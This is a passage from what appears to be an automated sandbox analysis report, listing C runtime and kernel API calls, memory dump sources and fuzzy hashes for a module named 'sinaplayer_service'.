                                                                                                                                                                                                    • _tolower_l.MSVCR120(00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000004,00000000,00000000,00000000,00000004,00000000,00000000,00000000,00000001), ref: 6D0AA128
                                                                                                                                                                                                    • _errno.MSVCR120(00000000,00000001,00000000,00000004,00000000,00000000,00000000,00000004,00000000,00000000,00000000,00000001,?,00000000,00000000,6D163B90), ref: 6D0DAA7B
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(00000000,00000001,00000000,00000004,00000000,00000000,00000000,00000004,00000000,00000000,00000000,00000001,?,00000000,00000000,6D163B90), ref: 6D0DAA86
                                                                                                                                                                                                    • ___ascii_stricmp.LIBCMT ref: 6D0DAA97
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _tolower_l$___ascii_stricmp_errno_getptd_invalid_parameter_noinfo
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3107707399-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _fileno.MSVCR120(?,6D0AFF90,00000008), ref: 6D0AFF15
                                                                                                                                                                                                    • _lock_file.MSVCR120(?,?,6D0AFF90,00000008), ref: 6D0AFF1D
                                                                                                                                                                                                      • Part of subcall function 6D094B96: _lock.MSVCR120(?), ref: 6D094BC1
                                                                                                                                                                                                    • _lseek.MSVCR120(00000000,00000000,00000000,?,?,6D0AFF90,00000008), ref: 6D0AFF6C
                                                                                                                                                                                                    • _errno.MSVCR120(6D0AFF90,00000008), ref: 6D0D58D0
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(6D0AFF90,00000008), ref: 6D0D58DB
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno_fileno_invalid_parameter_noinfo_lock_lock_file_lseek
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3904067199-0
                                                                                                                                                                                                    • Opcode ID: a2377291d205dd3c775ea70bf70af0e34163ec7b81b1f60d36807a435c19ddc5
                                                                                                                                                                                                    • Instruction ID: 25a00bb5dc45c91e5fd475052b974f6ec23d7b3b5b0713acfb5bdd464ee3056a
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a2377291d205dd3c775ea70bf70af0e34163ec7b81b1f60d36807a435c19ddc5
                                                                                                                                                                                                    • Instruction Fuzzy Hash: CE112732514700AAFA208FB98C0176D3BA4AF03374F2A8309F5358F1D2CB39D6019756
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • TlsSetValue.KERNEL32(?,?), ref: 6D0ECA00
                                                                                                                                                                                                    • GetCurrentThread.KERNEL32 ref: 6D0ECA35
                                                                                                                                                                                                    • Concurrency::details::SchedulerProxy::DecrementCoreSubscription.LIBCMT ref: 6D0ECA48
                                                                                                                                                                                                      • Part of subcall function 6D0EEE8E: GetLastError.KERNEL32(?,?,?,6D0D30F2), ref: 6D0EEE94
                                                                                                                                                                                                      • Part of subcall function 6D0EEE8E: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000,?,?,?,6D0D30F2), ref: 6D0EEEAA
                                                                                                                                                                                                      • Part of subcall function 6D0EEE8E: _CxxThrowException.MSVCR120(?,6D15CF40,00000000,?,?,?,6D0D30F2), ref: 6D0EEEB8
                                                                                                                                                                                                      • Part of subcall function 6D0EC9DA: List.LIBCMT ref: 6D0ECA67
                                                                                                                                                                                                      • Part of subcall function 6D0EC9DA: free.MSVCR120(?,?), ref: 6D0ECA73
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Concurrency::details::Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCoreCurrentDecrementErrorExceptionLastListProxy::SchedulerSubscriptionThreadThrowValuefree
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3155433331-0
                                                                                                                                                                                                    • Opcode ID: 9b89699d44a2a8f4967c9c2acf5442ecf3821cd6c3947f9f6d86fbc73242869d
                                                                                                                                                                                                    • Instruction ID: 20f832ebb6fe9219e063e132f03c2e3b236402bbb2321553eee9a3ccb113b756
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9b89699d44a2a8f4967c9c2acf5442ecf3821cd6c3947f9f6d86fbc73242869d
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0611E3311087008FE630DFA2E854BBBB7F8FF09358B08460EE5C747590CB22A8048BA5
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • wcslen.MSVCR120(?,6D0B1C00,00000014), ref: 6D0B1BB9
                                                                                                                                                                                                    • _lock_file.MSVCR120(?,?,6D0B1C00,00000014), ref: 6D0B1BC2
                                                                                                                                                                                                      • Part of subcall function 6D094B96: _lock.MSVCR120(?), ref: 6D094BC1
                                                                                                                                                                                                    • _fputwc_nolock.MSVCR120(?,?,6D0B1C00,00000014), ref: 6D0B1BE7
                                                                                                                                                                                                    • _errno.MSVCR120(6D0B1C00,00000014), ref: 6D0D4FCE
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(6D0B1C00,00000014), ref: 6D0D4FD9
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno_fputwc_nolock_invalid_parameter_noinfo_lock_lock_filewcslen
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1101344634-0
                                                                                                                                                                                                    • Opcode ID: 4b76de0785d98981b79d58dd6c4cbd14a4a4878be8069e6a154c75eddc9c8971
                                                                                                                                                                                                    • Instruction ID: c2bbdc3b018b11c9a170c5350bc5d893a3af65fe97065e28564bdc772c22ba67
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4b76de0785d98981b79d58dd6c4cbd14a4a4878be8069e6a154c75eddc9c8971
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1211E571A0C31AABFB108F69984077E76B4FF09354B11412EF920EB2C0DF35C9419B69
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 6D0A3AF4: TlsGetValue.KERNEL32(6D0A3DF7,00000000,00000000,?,?,?,?,?,?,?,6D094938,000000FF), ref: 6D0A3AFA
                                                                                                                                                                                                    • SetEvent.KERNEL32(?,00000004,?,00000000), ref: 6D0ECBE0
                                                                                                                                                                                                    • ??0exception@std@@QAE@XZ.MSVCR120 ref: 6D0ECBF8
                                                                                                                                                                                                    • ??0exception@std@@QAE@XZ.MSVCR120(00000004,?,00000000), ref: 6D0ECC0E
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(6D0E7774,6D15CF5C), ref: 6D0ECC23
                                                                                                                                                                                                    • std::exception::exception.LIBCMT(6D15CF5C,?,?,6D0E7774,6D15CF5C), ref: 6D0ECC32
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ??0exception@std@@$EventExceptionThrowValuestd::exception::exception
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 4125633965-0
                                                                                                                                                                                                    • Opcode ID: 7cec0bad00454f2f8e6c477e53090ff1ac2a26f9cae7ed14ccfebc1b74e4cadd
                                                                                                                                                                                                    • Instruction ID: f2e7f98adc352c17fab1754f5964d597f29e232c1e94b6b937624b1648b8ae42
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7cec0bad00454f2f8e6c477e53090ff1ac2a26f9cae7ed14ccfebc1b74e4cadd
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9A116B71908208AFE714DFA8CC05AEDBBB8EF01290B4082AAF62497151DF72E901CB84
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 6D0AD40E: EncodePointer.KERNEL32(00000000,?,6D0ACA0D,6D0ACA91,6D091A28,00000008,6D091A5F,?,00000001,?), ref: 6D0AD411
                                                                                                                                                                                                      • Part of subcall function 6D0AD40E: __initp_misc_winsig.LIBCMT ref: 6D0AD42C
                                                                                                                                                                                                      • Part of subcall function 6D0AD40E: GetModuleHandleW.KERNEL32(kernel32.dll,00000000), ref: 6D0AD448
                                                                                                                                                                                                      • Part of subcall function 6D0AD40E: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 6D0AD45C
                                                                                                                                                                                                      • Part of subcall function 6D0AD40E: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 6D0AD46F
                                                                                                                                                                                                      • Part of subcall function 6D0AD40E: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 6D0AD482
                                                                                                                                                                                                      • Part of subcall function 6D0AD40E: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 6D0AD495
                                                                                                                                                                                                      • Part of subcall function 6D0AD40E: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 6D0AD4A8
                                                                                                                                                                                                      • Part of subcall function 6D0AD40E: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 6D0AD4BB
                                                                                                                                                                                                      • Part of subcall function 6D0AD40E: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 6D0AD4CE
                                                                                                                                                                                                      • Part of subcall function 6D0AD40E: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 6D0AD4E1
                                                                                                                                                                                                      • Part of subcall function 6D0AD40E: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 6D0AD4F4
                                                                                                                                                                                                      • Part of subcall function 6D0AD40E: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 6D0AD507
                                                                                                                                                                                                      • Part of subcall function 6D0AD40E: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 6D0AD51A
                                                                                                                                                                                                      • Part of subcall function 6D0AD40E: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 6D0AD52D
                                                                                                                                                                                                      • Part of subcall function 6D0AD40E: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 6D0AD540
                                                                                                                                                                                                      • Part of subcall function 6D0AD40E: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 6D0AD553
                                                                                                                                                                                                      • Part of subcall function 6D0AD40E: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 6D0AD566
                                                                                                                                                                                                    • __crtFlsAlloc.MSVCR120(?,6D0ACA91,6D091A28,00000008,6D091A5F,?,00000001,?), ref: 6D0ACA1F
                                                                                                                                                                                                    • _calloc_crt.MSVCR120(00000001,000003BC,?,6D0ACA91,6D091A28,00000008,6D091A5F,?,00000001,?), ref: 6D0ACA3B
                                                                                                                                                                                                    • __crtFlsSetValue.MSVCR120(00000000,?,6D0ACA91,6D091A28,00000008,6D091A5F,?,00000001,?), ref: 6D0ACA4F
                                                                                                                                                                                                    • _initptd.MSVCR120(00000000,00000000,6D0ACA91,6D091A28,00000008,6D091A5F,?,00000001,?), ref: 6D0ACA5D
                                                                                                                                                                                                      • Part of subcall function 6D091BFD: _lock.MSVCR120(0000000D), ref: 6D091C41
                                                                                                                                                                                                      • Part of subcall function 6D091BFD: _lock.MSVCR120(0000000C), ref: 6D091C62
                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6D0ACA64
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AddressProc$__crt_lock$AllocCurrentEncodeHandleModulePointerThreadValue__initp_misc_winsig_calloc_crt_initptd
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 4031882113-0
                                                                                                                                                                                                    • Opcode ID: 75afa3a476287907d0b4d6f1bd2cc58141bc6d4f410ecb09102790abfe2794af
                                                                                                                                                                                                    • Instruction ID: d73def9b7e1dd5d9e427506637a007a3011931852b7ef35bedf726363dc6740b
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 75afa3a476287907d0b4d6f1bd2cc58141bc6d4f410ecb09102790abfe2794af
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 27F0F63690EB122EF714BAB47C0576A36D8DB03678F26061AE674DE0C5FF21C4028996
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _get_osfhandle.MSVCR120(00000000,00000000,00000000,00000000,00000000,?,6D0DE899,00000000,00000000,00000000,00000002,00000000,00000000,00000000), ref: 6D097FE9
                                                                                                                                                                                                    • SetFilePointerEx.KERNEL32(00000000,6D0D5D30,?,00000000,00000000,00000000,00000000,00000000,00000000,?,6D0DE899,00000000,00000000,00000000,00000002,00000000), ref: 6D098008
                                                                                                                                                                                                    • _errno.MSVCR120(00000000,00000000,00000000,00000000,?,6D0DE899,00000000,00000000,00000000,00000002,00000000,00000000,00000000), ref: 6D0DEE36
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,6D0DE899,00000000,00000000,00000000,00000002,00000000,00000000,00000000), ref: 6D0DEE4A
                                                                                                                                                                                                    • __dosmaperr.LIBCMT(00000000,?,6D0DE899,00000000,00000000,00000000,00000002,00000000,00000000,00000000), ref: 6D0DEE51
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ErrorFileLastPointer__dosmaperr_errno_get_osfhandle
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1165083932-0
                                                                                                                                                                                                    • Opcode ID: 8b7d619db551882222eeb8e4aa872068f53fd920d9e221838ece4e24e55abe05
                                                                                                                                                                                                    • Instruction ID: 2d6144ff980898e4d35d4b59240e97a488bc0633dd1d87b7423100366b1b56d3
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8b7d619db551882222eeb8e4aa872068f53fd920d9e221838ece4e24e55abe05
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5A012632614256AFEF018F98EC08AAE7729EB46230B114249F920CB2D0EBB0D80087A0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno$_invalid_parameter_noinfo
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2819658684-0
                                                                                                                                                                                                    • Opcode ID: ed63b4994c3a89f3ec513b349af7bdf55bc979a2067521c0592a908836a15b65
                                                                                                                                                                                                    • Instruction ID: d5cd6fa28ea987c7b6b45dc448d6b0f4e415dcf146f1287ee417fc7ab1d40c24
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ed63b4994c3a89f3ec513b349af7bdf55bc979a2067521c0592a908836a15b65
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C001A23141531A9AEB156EA4C8043BF3AA4FF46374F515606F9388E0E0D77584A0EBA2
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • DecodePointer.KERNEL32(00000000,?,?,?,?,6D0ABE8C,?,6D0ABEA8,0000000C,6D0ACCD6,?,?,6D0ACD0C,6D0D1BD1,?,6D0ACD94), ref: 6D0ABED7
                                                                                                                                                                                                    • DecodePointer.KERNEL32(?,?,?,?,6D0ABE8C,?,6D0ABEA8,0000000C,6D0ACCD6,?,?,6D0ACD0C,6D0D1BD1,?,6D0ACD94,00000000), ref: 6D0ABEE2
                                                                                                                                                                                                    • _msize.MSVCR120(00000000,?,?,?,?,6D0ABE8C,?,6D0ABEA8,0000000C,6D0ACCD6,?,?,6D0ACD0C,6D0D1BD1,?,6D0ACD94), ref: 6D0ABF02
                                                                                                                                                                                                      • Part of subcall function 6D09CA0E: HeapSize.KERNEL32(00000000,00000000,?,6D0ABF07,00000000,?,?,?,?,6D0ABE8C,?,6D0ABEA8,0000000C,6D0ACCD6,?), ref: 6D09CA26
                                                                                                                                                                                                    • EncodePointer.KERNEL32(?,?,?,?,?,6D0ABE8C,?,6D0ABEA8,0000000C,6D0ACCD6,?,?,6D0ACD0C,6D0D1BD1,?,6D0ACD94), ref: 6D0ABF18
                                                                                                                                                                                                    • EncodePointer.KERNEL32(00000000,?,?,?,?,6D0ABE8C,?,6D0ABEA8,0000000C,6D0ACCD6,?,?,6D0ACD0C,6D0D1BD1,?,6D0ACD94), ref: 6D0ABF24
                                                                                                                                                                                                    • _realloc_crt.MSVCR120(00000000,00000800,?,?,?,?,6D0ABE8C,?,6D0ABEA8,0000000C,6D0ACCD6,?,?,6D0ACD0C,6D0D1BD1), ref: 6D0ADBFF
                                                                                                                                                                                                    • EncodePointer.KERNEL32(00000000,?,?,?,?,6D0ABE8C,?,6D0ABEA8,0000000C,6D0ACCD6,?,?,6D0ACD0C,6D0D1BD1,?,6D0ACD94), ref: 6D0ADC15
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Pointer$Encode$Decode$HeapSize_msize_realloc_crt
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 765448609-0
                                                                                                                                                                                                    • Opcode ID: 3ecd9715f46be8aca2933e3ecf0642f2f2bfa3269eaee8a9cc21c8bb5032460a
                                                                                                                                                                                                    • Instruction ID: 7339c668912bef605d5333bb9ae3124bca1544e565fc6e1e588dd71ea1eecb26
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3ecd9715f46be8aca2933e3ecf0642f2f2bfa3269eaee8a9cc21c8bb5032460a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5501A471510154EFEF01DFA4E984AE9BBFAFB89294344016AE905D7200FBB1DD10DB90
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _lock_file.MSVCR120(?,6D095A70,0000000C), ref: 6D095A38
                                                                                                                                                                                                      • Part of subcall function 6D094B96: _lock.MSVCR120(?), ref: 6D094BC1
                                                                                                                                                                                                    • _fread_nolock_s.MSVCR120(?,?,?,?,?,6D095A70,0000000C), ref: 6D095A4E
                                                                                                                                                                                                      • Part of subcall function 6D095938: memcpy_s.MSVCR120(?,?,?,?,00000000), ref: 6D0959E0
                                                                                                                                                                                                      • Part of subcall function 6D0958ED: _unlock_file.MSVCR120(?,6D095A67), ref: 6D0958EE
                                                                                                                                                                                                    • memset.MSVCR120(?,00000000,000000FF,?,?,6D095A70,0000000C), ref: 6D0D5609
                                                                                                                                                                                                    • _errno.MSVCR120(?,?,6D095A70,0000000C), ref: 6D0D5611
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(?,?,6D095A70,0000000C), ref: 6D0D561C
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno_fread_nolock_s_invalid_parameter_noinfo_lock_lock_file_unlock_filememcpy_smemset
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 4031208221-0
                                                                                                                                                                                                    • Opcode ID: a71b9ae3216d2e894d1144e73799622cd2d6b3c0e87d3f071eb16b09059621cd
                                                                                                                                                                                                    • Instruction ID: 2a41814e88d2a3e6a188a8caca032dfc8bda6927732ab3e786f4ce58eece47bc
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a71b9ae3216d2e894d1144e73799622cd2d6b3c0e87d3f071eb16b09059621cd
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 99019E75805606EAEF029F668C04BBE3BA0EF45361B414115F9346B1A0D7318611EF91
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno$_invalid_parameter_noinfo
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2819658684-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _localtime64_s.MSVCR120(?,?), ref: 6D097ED4
                                                                                                                                                                                                    • asctime.MSVCR120(?), ref: 6D097EE3
                                                                                                                                                                                                    • _errno.MSVCR120(00000000,00000000,00000000,00000000,00000000,0000000B,?,00000001), ref: 6D0D6901
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(00000000,00000000,00000000,00000000,00000000,0000000B,?,00000001), ref: 6D0D690C
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D0D6916
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno$_invalid_parameter_noinfo_localtime64_sasctime
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1110404623-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D108548
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120 ref: 6D108553
                                                                                                                                                                                                      • Part of subcall function 6D124670: _invalid_parameter.MSVCR120(00000000,00000000,00000000,00000000,00000000,6D0FB412,?,6D0FBD2C,00000003,6D0D3BC7,6D094630,00000008,6D0AC625,?), ref: 6D124677
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D108575
                                                                                                                                                                                                    • _localtime64_s.MSVCR120(?,?), ref: 6D108587
                                                                                                                                                                                                      • Part of subcall function 6D097888: memset.MSVCR120(?,000000FF,00000024), ref: 6D0978AF
                                                                                                                                                                                                      • Part of subcall function 6D097888: _get_daylight.MSVCR120(?), ref: 6D0978EA
                                                                                                                                                                                                      • Part of subcall function 6D097888: _get_dstbias.MSVCR120(?), ref: 6D0978FC
                                                                                                                                                                                                      • Part of subcall function 6D097888: _get_timezone.MSVCR120(?), ref: 6D09790E
                                                                                                                                                                                                      • Part of subcall function 6D097888: _gmtime64_s.MSVCR120(?,?), ref: 6D097942
                                                                                                                                                                                                      • Part of subcall function 6D097888: _gmtime64_s.MSVCR120(?,?), ref: 6D09796C
                                                                                                                                                                                                    • __wasctime.LIBCMT(?), ref: 6D108596
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno_gmtime64_s$__wasctime_get_daylight_get_dstbias_get_timezone_invalid_parameter_invalid_parameter_noinfo_localtime64_smemset
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2959933861-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _control87.MSVCR120(00000001,?,00000000,?,6D0FCAB9,00000000,00010000,00030000,?,6D0E0802,?,6D0ACCEB,?,?,6D0ACD94,00000000), ref: 6D0AC9E1
                                                                                                                                                                                                    • _control87.MSVCR120(00000000,00000000,00000000,?,6D0FCAB9,00000000,00010000,00030000,?,6D0E0802,?,6D0ACCEB,?,?,6D0ACD94,00000000), ref: 6D0E14C2
                                                                                                                                                                                                    • _errno.MSVCR120(00000000,?,6D0FCAB9,00000000,00010000,00030000,?,6D0E0802,?,6D0ACCEB,?,?,6D0ACD94,00000000), ref: 6D0E14CB
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(00000000,?,6D0FCAB9,00000000,00010000,00030000,?,6D0E0802,?,6D0ACCEB,?,?,6D0ACD94,00000000), ref: 6D0E14D5
                                                                                                                                                                                                    • _control87.MSVCR120(00000001,?,00000000,?,6D0FCAB9,00000000,00010000,00030000,?,6D0E0802,?,6D0ACCEB,?,?,6D0ACD94,00000000), ref: 6D0E14E1
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _control87$_errno_invalid_parameter_noinfo
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1498936549-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D100A96
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120 ref: 6D100AA1
                                                                                                                                                                                                      • Part of subcall function 6D124670: _invalid_parameter.MSVCR120(00000000,00000000,00000000,00000000,00000000,6D0FB412,?,6D0FBD2C,00000003,6D0D3BC7,6D094630,00000008,6D0AC625,?), ref: 6D124677
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D100ABF
